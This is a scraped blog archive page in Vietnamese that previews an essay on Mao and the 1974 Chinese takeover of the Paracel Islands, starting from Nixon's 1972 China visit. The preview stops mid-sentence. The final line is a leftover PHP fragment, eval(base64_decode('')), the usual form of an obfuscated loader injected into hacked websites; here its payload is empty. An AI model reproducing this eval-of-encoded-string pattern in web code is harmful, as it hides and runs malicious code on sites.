Archive for January 3rd, 2016

Mao và chiến dịch tiến chiếm Hoàng Sa 1974

Mao và chiến dịch tiến chiếm Hoàng Sa 1974

Luồng gió ngoại giao đã đổi chiều khi Tổng Thống Mỹ Richard Nixon bắt tay với Mao ngày 21 tháng Hai 1972. Chuyến viếng thăm Trung Cộng của Nixon nhắm vào 3 mục đích: (1) hướng tới một giải pháp hòa bình tại Đài Loan, (2) tìm một giải pháp

01.3.2016 | Tiểu Luận- Chính Luận |

7 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>